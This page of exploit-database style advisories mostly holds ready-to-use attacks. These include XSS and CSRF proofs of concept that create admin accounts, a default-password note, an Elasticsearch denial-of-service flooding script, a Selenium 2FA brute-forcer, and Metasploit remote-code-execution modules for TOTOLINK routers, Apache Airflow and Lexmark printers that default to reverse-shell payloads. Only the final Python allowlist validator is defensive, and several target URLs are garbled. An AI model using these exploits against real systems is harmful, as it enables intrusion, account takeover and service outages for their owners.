<pre><code>====================================================================================================================================<br />| # Title : LogoBee CMS v0.2 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://logobee.com | <br />| # Dork : intext:''Logo & Web Design by LogoBee'' |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Lamano LMS v0.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.lamano.lu/ | <br />| # Dork : © 2018 Lamano by easysolutions |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] Use payload : user = admin & Pass : 1234<br /><br />[+] https://www.sylviebecker127.0.0.1lu<br /></code></pre>
<pre><code># Exploit Author: TOUHAMI KASBAOUI<br /># Vendor Homepage: https://elastic.co/<br /># Version: 8.5.3 / OpenSearch<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE : CVE-2023-31419<br /># Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419<br /><br />import random<br />import requests<br />import string<br /><br />es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL<br />index_name = '*'<br /><br /># Crafted query text for the _search API; CVE-2023-31419 is a stack overflow (denial of service) triggered by such input<br />payload = "/*" * 10000 + "\\" + "'" * 999<br /><br />verify_ssl = False<br /><br />username = 'elastic'<br />password = 'changeme'<br /><br />auth = (username, password)<br /><br />num_queries = 100<br /><br />for i in range(num_queries):<br />    # Random filler so every query is distinct, followed by the crafted payload<br />    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))<br />    search_query = {<br />        "query": {<br />            "match": {<br />                "message": (symbols * 9000) + payload<br />            }<br />        }<br />    }<br /><br />    print(f"Query {i + 1} - Search Query:")<br /><br />    search_endpoint = f'{es_url}/{index_name}/_search'<br />    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)<br /><br />    if response.status_code == 200:<br />        search_results = response.json()<br /><br />        print(f"Query {i + 1} - Response:")<br />        print(search_results)<br /><br />        total_hits = search_results['hits']['total']['value']<br />        print(f"Query {i + 1}: Total hits: {total_hits}")<br /><br />        for hit in search_results['hits']['hits']:<br />            source_data = hit['_source']<br />            print(f"Payload result: {source_data}")<br />    else:<br />        print(f"Error for query {i + 1}: {response.status_code} - {response.text}")<br /></code></pre>
<pre><code>## Title: TASKHUB-2.8.8-XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/22/2023<br />## Vendor: https://codecanyon.net/user/infinitietech<br />## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874<br />## Reference: https://portswigger.net/web-security/cross-site-scripting<br /><br /><br />## Description:<br />The value of the JSON parameter within the project parameter is copied<br />into the HTML document as plain text between tags. The payload<br />vn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSON<br />parameter within the project parameter. This input was echoed<br />unmodified in the application's response. An attacker who is already<br />authenticated (using an ordinary user account) can, depending on the<br />scenario, obtain a CSRF token and the session cookie.<br /><br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Test exploit:<br /><br />```<br />surw7%3Cscript%3Ealert(1)%3C%2fscript%3E<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)<br /><br />## Time spent:<br />01:10:00<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::CmdStager<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.',<br />        'Description' => %q{<br />          Multiple TOTOLINK network products contain a command insertion vulnerability in setting/setTracerouteCfg.<br />          This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.<br />          After exploitation, an attacker will have full access with the same user privileges under<br />          which the webserver is running (typically as user `root`, ;-).<br /><br />          The following TOTOLINK network products and firmware are vulnerable:<br />          - Wireless Gigabit Router model X5000R with firmware X5000R_V9.1.0u.6118_B20201102.zip;<br />          - Wireless Gigabit Router model A7000R with firmware A7000R_V9.1.0u.6115_B20201022.zip;<br />          - Wireless Gigabit Router model A3700R with firmware A3700R_V9.1.2u.6134_B20201202.zip;<br />          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6095_B20200916.zip;<br />          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6139_B20201216.zip;<br />          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6095_B20200916.zip;<br />          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6139_B20201216.zip;<br />          - Wireless Extender model EX1200L with firmware EX1200L_V9.3.5u.6146_B20201023.zip; and<br />          - probably more looking at the scale of impacted devices :-(<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br />          'Kazamayc https://github.com/Kazamayc', # Discovery of the vulnerability<br />        ],<br />        'References' => [<br />          ['CVE', '2023-30013'],<br />          ['URL', 'https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013'],<br />          ['URL', 'https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2']<br />        ],<br />        'DisclosureDate' => '2023-05-05',<br />        'Platform' => ['unix', 'linux'],<br />        'Arch' => [ARCH_CMD, ARCH_MIPSLE],<br />        'Privileged' => true,<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => 'unix',<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'<br />              }<br />            }<br />          ],<br />          [<br />            'Linux Dropper',<br />            {<br />              'Platform' => 'linux',<br />              'Arch' => [ARCH_MIPSLE],<br />              'Type' => :linux_dropper,<br />              'CmdStagerFlavor' => ['wget', 'echo'],<br />              'Linemax' => 65535,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'RPORT' => 80,<br />          'SSL' => false<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br />        }<br />      )<br />    )<br />    register_options([<br />      OptInt.new('SLEEP', [true, 'Sleep time in seconds to test blind command injection', 3])<br />    ])<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    num = rand(1..500)<br />    return send_request_cgi({<br />      'method' => 'POST',<br />      'ctype' => 'application/x-www-form-urlencoded',<br />      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'cstecgi.cgi'),<br />      'keep_cookies' => true,<br />      'data' => "{\"command\":\"127.0.0.1; #{cmd};#\",\"num\":\"#{num}\",\"topicurl\":\"setTracerouteCfg\"}"<br />    })<br />  end<br /><br />  def check<br />    # Check whether the target is vulnerable by injecting a sleep command and timing the response<br />    print_status("Checking if #{peer} can be exploited.")<br />    sleep_time = datastore['SLEEP']<br /><br />    # check the response to an echo command to determine if the vulnerable traceroute function is available<br />    res = execute_command("echo #{sleep_time}")<br />    return CheckCode::Unknown('No response received from target.') unless res<br />    return CheckCode::Safe('No valid response received from target.') unless res.code == 200 && res.body.include?('success')<br /><br />    # if the vulnerable traceroute function is available, perform blind command injection using the sleep command<br />    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br />    res, elapsed_time = Rex::Stopwatch.elapsed_time do<br />      execute_command("sleep #{sleep_time}")<br />    end<br />    return CheckCode::Unknown('No response received from target.') unless res<br />    return CheckCode::Safe('No valid response received from target.') unless res.code == 200 && res.body.include?('success')<br /><br />    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")<br />    return CheckCode::Safe('Blind command injection failed.') unless elapsed_time >= sleep_time<br /><br />    CheckCode::Vulnerable('Successfully tested blind command injection.')<br />  end<br /><br />  def exploit<br />    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br />    case target['Type']<br />    when :unix_cmd<br />      execute_command(payload.encoded)<br />    when :linux_dropper<br />      # Don't check the response here since the server won't respond<br />      # if the payload is successfully executed.<br />      execute_cmdstager({ linemax: target.opts['Linemax'] })<br />    end<br />  end<br />end<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Luxcal Event Calendar v3.2.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.LuxSoft.eu |<br />| # Dork : powered by LuxSoft |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code creates a new admin.<br /><br />[+] Go to line 2.<br /><br />[+] Set the target site link, save the changes and apply.<br /><br />[+] Affected file : index.php<br /><br />[+] http://127.0.0.1/q7.3/index.php.<br /><br />[+] Save the code as poc.html.<br /><br /><html><br /><form method="POST" name="form0" action="http://127.0.0.1/lux/index.php?lc&editUser=y&uid=add"><br /><input type="hidden" name="uname" value="tcyber"/><br /><input type="hidden" name="email" value="g4k@hot.mail"/><br /><input type="hidden" name="new_pw" value="123456"/><br /><input type="hidden" name="userRights" value="9"/><br /><input type='submit' name='addExe' value="Add Profile"><br /></form><br /></html><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Lamano CMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.lamano.lu/ | <br />| # Dork : © 2018 Lamano by easysolutions |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code creates a new admin.<br /><br />[+] Go to line 8.<br /><br />[+] Set the target site link, save the changes and apply.<br /><br />[+] Affected file : admin.php<br /><br />[+] http://127.0.0.1/q73/admin.php .<br /><br />[+] Save the code as poc.html.<br /><br /><!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /><br /></tr><br /> </table><br /> <br/><br/><br /> <form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST"><br /> <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350"><br /> <tr><br /> <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td><br /> </tr><br /> <tr><br /> <td class="tah11" align="right">Nom d'utilisateur :</td><br /> <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td><br /> </tr><br /> <tr><br /> <td class="tah11" align="right">Mot de passe : </td><br /> <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td><br /> </tr><br /> <tr><br /> <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td><br /> </tr><br /> </table><br /> </form><br/><br/><br /><div><br /></code></pre>
<pre><code>The Theme My Login plugin before 1.2 does not limit how often a 2FA code can be entered incorrectly, so the code can be brute-forced to bypass 2FA. A working Python exploit:<br /><br />from selenium import webdriver<br />from selenium.common.exceptions import TimeoutException<br />from selenium.webdriver.common.by import By<br />from selenium.webdriver.support import expected_conditions as EC<br />from selenium.webdriver.support.ui import WebDriverWait<br /><br />driver = webdriver.Firefox()<br />driver.get("websiteloginhere")<br /><br /># Locate the username field by its 'id' attribute and fill it in<br />username_field = driver.find_element(By.ID, "user_login")<br />username_field.click()<br />username_field.send_keys("usernamehere")<br /><br /># Locate the password field by its 'id' attribute and fill it in<br />password_field = driver.find_element(By.ID, "user_pass")<br />password_field.click()<br />password_field.send_keys("passwordhere")<br /><br /># Locate the Log In button and click it<br />login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")<br />login_button.click()<br /><br /># From here, try every code from 000000 to 999999, or stop once the code input can no longer be found after waiting<br />for i in range(1000000):<br />    code = str(i).zfill(6)<br /><br />    try:<br />        wait = WebDriverWait(driver, 10)<br />        code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']")))<br />    except TimeoutException:<br />        # The code input is gone: the code was accepted or the page moved on<br />        break<br /><br />    code_field.click()<br />    code_field.clear()<br />    code_field.send_keys(code)<br /><br />    verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")<br />    verify_button.click()<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Apache Airflow 1.10.10 - Example DAG Remote Code Execution',<br />        'Description' => %q{<br />          This module exploits an unauthenticated command injection vulnerability<br />          by combining two critical vulnerabilities in Apache Airflow 1.10.10.<br />          The first, CVE-2020-11978, is an authenticated command injection vulnerability<br />          found in one of Airflow's example DAGs, "example_trigger_target_dag", which<br />          allows any authenticated user to run arbitrary OS commands as the user<br />          running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default<br />          setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's<br />          Experimental REST API to perform malicious actions such as creating the<br />          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation<br />          and command injection, leading to unauthenticated remote code execution.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'xuxiang', # Original discovery and CVE submission<br />          'Pepe Berba', # ExploitDB author<br />          'Ismail E. Dawoodjee' # Metasploit module author<br />        ],<br />        'References' => [<br />          [ 'EDB', '49927' ],<br />          [ 'CVE', '2020-11978' ],<br />          [ 'CVE', '2020-13927' ],<br />          [ 'URL', 'https://github.com/pberba/CVE-2020-11978/' ],<br />          [ 'URL', 'https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx' ],<br />          [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],<br />        ],<br />        'Platform' => ['linux', 'unix'],<br />        'Arch' => ARCH_CMD,<br />        'Targets' => [<br />          [<br />            'Unix Command', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp' } }<br />          ],<br />        ],<br />        'Privileged' => false,<br />        'DisclosureDate' => '2020-07-14',<br />        'DefaultTarget' => 0,<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br />        }<br />      )<br />    )<br />    register_options(<br />      [<br />        Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),<br />        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),<br />        OptString.new('DAG_PATH', [<br />          true,<br />          'Path to vulnerable example DAG',<br />          '/api/experimental/dags/example_trigger_target_dag'<br />        ]),<br />        OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])<br />      ]<br />    )<br />  end<br /><br />  def check<br />    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')<br />    vprint_status("Checking target web server for a response at: #{full_uri(uri)}")<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => uri<br />    })<br /><br />    unless res<br />      return CheckCode::Unknown('Target did not respond to check request.')<br />    end<br /><br />    unless res.code == 200 &&<br />           res.body.downcase.include?('admin') &&<br />           res.body.downcase.include?('_csrf_token') &&<br />           res.body.downcase.include?('sign in to airflow')<br />      return CheckCode::Unknown('Target is not running Apache Airflow.')<br />    end<br /><br />    vprint_good('Target is running Apache Airflow.')<br /><br />    vprint_status('Checking Apache Airflow version...')<br />    version_number = res.body.to_s.scan(<br />      %r{<a href="https://airflow[.]apache[.]org/docs/([\d.]+)"}<br />    ).flatten.first<br /><br />    unless version_number<br />      return CheckCode::Detected('Apache Airflow version cannot be determined.')<br />    end<br /><br />    unless Rex::Version.new(version_number) < Rex::Version.new('1.10.11')<br />      return CheckCode::Safe<br />    end<br /><br />    vprint_status(<br />      "Target is running Apache Airflow Version #{version_number}. " \<br />      'Performing additional checks for exploitability...'<br />    )<br /><br />    # Each helper returns nil when its check passes and a CheckCode when it fails,<br />    # so the first failing check decides the verdict instead of being discarded.<br />    result = check_api || check_task || check_unpaused<br />    return result if result<br /><br />    return CheckCode::Appears<br />  end<br /><br />  def check_api<br />    uri = normalize_uri(target_uri.path, 'api', 'experimental', 'test')<br />    vprint_status("Checking if Airflow Experimental REST API is accessible at: #{full_uri(uri)}")<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => uri<br />    })<br /><br />    unless res && res.code == 200<br />      return CheckCode::Safe('Could not access the Airflow Experimental REST API.')<br />    end<br /><br />    vprint_good('Airflow Experimental REST API is accessible.')<br />    nil<br />  end<br /><br />  def check_task<br />    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'tasks', 'bash_task')<br />    vprint_status('Checking for vulnerability of "example_trigger_target_dag.bash_task"...')<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => uri<br />    })<br /><br />    unless res && res.code == 200<br />      return CheckCode::Safe(<br />        'Could not find "example_trigger_target_dag.bash_task". ' \<br />        'Target is not vulnerable to CVE-2020-11978.'<br />      )<br />    end<br /><br />    if res.get_json_document['env'].include?('dag_run')<br />      return CheckCode::Safe(<br />        'The "example_trigger_target_dag.bash_task" is patched. ' \<br />        'Target is not vulnerable to CVE-2020-11978.'<br />      )<br />    end<br /><br />    vprint_good('The "example_trigger_target_dag.bash_task" is vulnerable.')<br />    nil<br />  end<br /><br />  def check_unpaused<br />    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'paused', 'false')<br />    vprint_status('Checking if "example_trigger_target_dag.bash_task" can be unpaused...')<br />    res = send_request_cgi({<br />      'method' => 'GET',<br />      'uri' => uri<br />    })<br /><br />    unless res && res.code == 200<br />      return CheckCode::Safe(<br />        'Could not unpause "example_trigger_target_dag.bash_task". ' \<br />        'Example DAGs were not loaded.'<br />      )<br />    end<br /><br />    vprint_good('The "example_trigger_target_dag.bash_task" is unpaused.')<br />    nil<br />  end<br /><br />  def create_dag(cmd)<br />    cmd = "echo #{Base64.strict_encode64(cmd)} | base64 -d | sh"<br />    uri = normalize_uri(target_uri.path, datastore['DAG_PATH'], 'dag_runs')<br />    vprint_status('Creating a new vulnerable DAG...')<br />    res = send_request_cgi({<br />      'method' => 'POST',<br />      'uri' => uri,<br />      'ctype' => 'application/json',<br />      'data' => JSON.generate({ conf: { message: "\"; #{cmd};#" } })<br />    })<br /><br />    unless res && res.code == 200<br />      fail_with(Failure::PayloadFailed, 'Failed to create DAG.')<br />    end<br /><br />    print_good("Successfully created DAG: #{res.get_json_document['message']}")<br />    return res.get_json_document['execution_date']<br />  end<br /><br />  def await_execution(execution_date)<br />    uri = normalize_uri(<br />      target_uri.path,<br />      datastore['DAG_PATH'],<br />      'dag_runs', execution_date, 'tasks', 'bash_task'<br />    )<br />    print_status('Waiting for Scheduler to run the vulnerable DAG. This might take a while...')<br />    vprint_warning('If the Bash task is never queued, then the Scheduler might not be running.')<br /><br />    i = 0<br />    loop do<br />      i += 1<br />      sleep(10)<br />      res = send_request_cgi({<br />        'method' => 'GET',<br />        'uri' => uri<br />      })<br /><br />      unless res && res.code == 200<br />        fail_with(Failure::Unknown, 'Bash task state cannot be determined.')<br />      end<br /><br />      state = res.get_json_document['state']<br />      if state == 'queued'<br />        print_status('Bash task is queued...')<br />      elsif state == 'running'<br />        print_good('Bash task is running. Expect a session if executed successfully.')<br />        break<br />      elsif state == 'success'<br />        print_good('Successfully ran Bash task. Expect a session soon.')<br />        break<br />      elsif state == 'None'<br />        print_warning('Bash task is not yet queued...')<br />      elsif state == 'scheduled'<br />        print_status('Bash task is scheduled...')<br />      else<br />        print_status("Bash task state: #{state}.")<br />        break<br />      end<br />      # stop the loop once the timeout has elapsed<br />      next unless datastore['TIMEOUT'] <= 10 * i<br /><br />      fail_with(Failure::TimeoutExpired,<br />                'Bash task did not run within the specified time ' \<br />                "- #{datastore['TIMEOUT']} seconds.")<br />    end<br />  end<br /><br />  def exploit<br />    print_status("Executing TARGET: \"#{target.name}\" with PAYLOAD: \"#{datastore['PAYLOAD']}\"")<br />    execution_date = create_dag(payload.encoded)<br />    await_execution(execution_date)<br />  end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  include Msf::Exploit::Remote::HttpClient<br />  include Msf::Exploit::Retry<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Lexmark Device Embedded Web Server RCE',<br />        'Description' => %q{<br />          An unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.<br />          The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked<br />          if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`<br />          is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.<br /><br />          A number of the configurable parameters on the page (e.g. `FT_Custom_lbtrace`) fail to be sanitized properly before being<br />          used in a bash eval statement: `eval "$cmd" > /dev/null`, allowing an unauthenticated user to run arbitrary commands.<br />        },<br />        'Author' => [<br />          'James Horseman', # Analysis & PoC<br />          'Zach Hanley', # Analysis & PoC<br />          'jheysel-r7' # Msf module<br />        ],<br />        'References' => [<br />          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-26067'],<br />          [ 'URL', 'https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf'],<br />          [ 'URL', 'https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/'],<br />          [ 'CVE', '2023-26068']<br />        ],<br />        'License' => MSF_LICENSE,<br />        'Platform' => ['unix'],<br />        'Privileged' => false,<br />        'Arch' => [ ARCH_CMD ],<br />        'Targets' => [<br />          [<br />            'Unix (In-Memory)',<br />            {<br />              'Platform' => ['unix'],<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_socat_tcp'<br />              }<br />            }<br />          ]<br />        ],<br />        'Payload' => {<br />          'Compat' =><br />          {<br />            'PayloadType' => 'cmd',<br />            'RequiredCmd' => 'socat'<br />          }<br />        },<br />        'DefaultTarget' => 0,<br />        'DisclosureDate' => '2023-03-13',<br />        'Notes' => {<br />          'Stability' => [ CRASH_SAFE ],<br />          'SideEffects' => [ ],<br />          'Reliability' => [ REPEATABLE_SESSION ]<br />        }<br />      )<br />    )<br /><br />    register_options(<br />      [<br />        OptInt.new('SLEEP', [true, 'Sleep time to wait for the printer to wake', 10]),<br />      ]<br />    )<br />  end<br /><br />  def check<br />    send_wakeup<br />    res = send_request_cgi(<br />      'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),<br />      'method' => 'GET'<br />    )<br /><br />    return Exploit::CheckCode::Unknown('The target did not respond') unless res<br />    return Exploit::CheckCode::Safe('The target does not seem to be vulnerable') unless res.code == 200 && res.get_xml_document.xpath('//title').text == 'Fax Trace Settings'<br /><br />    Exploit::CheckCode::Appears('The vulnerable endpoint "/cgi-bin/fax_change_faxtrace_settings" is reachable')<br />  end<br /><br />  # If the printer has been inactive for some time it might be sleeping, in which case it's best to send a request<br />  # or two to wake it up before running the check method or exploit.<br />  def send_wakeup<br />    retry_until_truthy(timeout: datastore['SLEEP']) do<br />      print_status('Waking up the printer...')<br />      res = send_request_cgi(<br />        'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),<br />        'method' => 'HEAD'<br />      )<br />      break if res && res.code == 200<br />    end<br />  end<br /><br />  def exploit<br />    if datastore['ForceExploit'] || !datastore['AutoCheck']<br />      send_wakeup<br />    end<br /><br />    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br />    res = send_request_cgi(<br />      'uri' => normalize_uri(target_uri.path, '/cgi-bin/fax_change_faxtrace_settings'),<br />      'method' => 'POST',<br />      'data' => "FT_Custom_lbtrace=3;$(#{payload.encoded});#"<br />    )<br />    print_error('A response to the exploit attempt was received. This indicates the exploit was likely unsuccessful') if res<br />  end<br />end<br /></code></pre>
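The Lexmark module above and the TOTOLINK module earlier on this page exploit the same weakness: a request parameter is pasted into a shell command without validation. As an added example that is not part of either Metasploit module, here is the allowlist check a handler should apply to those parameters (TOTOLINK's traceroute `command`, Lexmark's `FT_Custom_lbtrace`), reused as a detector over constructed request logs; the endpoint paths and parameter names come from the modules, while the expected value shapes, the numeric range and the log format are assumptions.

```python
"""Allowlist validation for the two injected parameters (added example, not part
of either Metasploit module). TOTOLINK's traceroute `command` must be an IP or a
hostname; Lexmark's `FT_Custom_lbtrace` must be a small integer (assumed range).
The same validators double as a detector over logged request bodies."""
import ipaddress
import json
import re
from urllib.parse import unquote_plus

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_traceroute_target(value: str) -> bool:
    """Accept only an IP literal or a hostname. Spaces, ';', '#', quotes and
    '$(' cannot pass, and a leading '-' is refused so the value cannot turn
    into an option when handed to traceroute."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))


def is_valid_trace_level(value: str, max_level: int = 9) -> bool:
    """Accept a short run of digits within [0, max_level] (assumed range)."""
    return bool(re.fullmatch(r"[0-9]{1,2}", value)) and int(value) <= max_level


# Endpoint -> {parameter: validator}. Paths and parameter names are the ones the
# two modules send; the expected value shapes are our assumption.
VALIDATORS = {
    "/cgi-bin/cstecgi.cgi": {"command": is_valid_traceroute_target},
    "/cgi-bin/fax_change_faxtrace_settings": {"FT_Custom_lbtrace": is_valid_trace_level},
}


def decode_body(body: str) -> dict:
    """Decode a JSON or form-urlencoded body into {name: value}, first value wins.
    The form parser splits on '&' only, so a ';' stays inside the value being
    validated instead of silently starting a new field."""
    stripped = body.strip()
    if stripped.startswith("{"):
        return {k: str(v) for k, v in json.loads(stripped).items()}
    fields = {}
    for pair in stripped.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            fields.setdefault(unquote_plus(name), unquote_plus(value))
    return fields


def validate_request(path: str, body: str) -> list:
    """Names of parameters that fail their allowlist; [] if clean or endpoint unknown."""
    rules = VALIDATORS.get(path, {})
    fields = decode_body(body)
    return [name for name, ok in rules.items() if name in fields and not ok(fields[name])]


def traceroute_argv(target: str) -> list:
    """The argv a handler should exec directly (no shell) once the target is validated."""
    if not is_valid_traceroute_target(target):
        raise ValueError("invalid traceroute target")
    return ["traceroute", target]


# Constructed proxy log that records request bodies, one "<method> <path> <body>" per line.
SAMPLE_LOG = """\
POST /cgi-bin/cstecgi.cgi {"command":"10.0.0.5","num":"41","topicurl":"setTracerouteCfg"}
POST /cgi-bin/cstecgi.cgi {"command":"127.0.0.1; sleep 3;#","num":"17","topicurl":"setTracerouteCfg"}
POST /cgi-bin/fax_change_faxtrace_settings FT_Custom_lbtrace=3
POST /cgi-bin/fax_change_faxtrace_settings FT_Custom_lbtrace=3;$(id);#
"""


def flag_log(log: str) -> list:
    """Run the validators over logged POSTs; returns [(line_no, path, bad_params)]."""
    hits = []
    for line_no, line in enumerate(log.splitlines(), 1):
        method, path, body = line.split(" ", 2)
        if method == "POST":
            bad = validate_request(path, body)
            if bad:
                hits.append((line_no, path, bad))
    return hits


if __name__ == "__main__":
    for hit in flag_log(SAMPLE_LOG):
        print("injection attempt on line %d: %s param(s) %s" % hit)
```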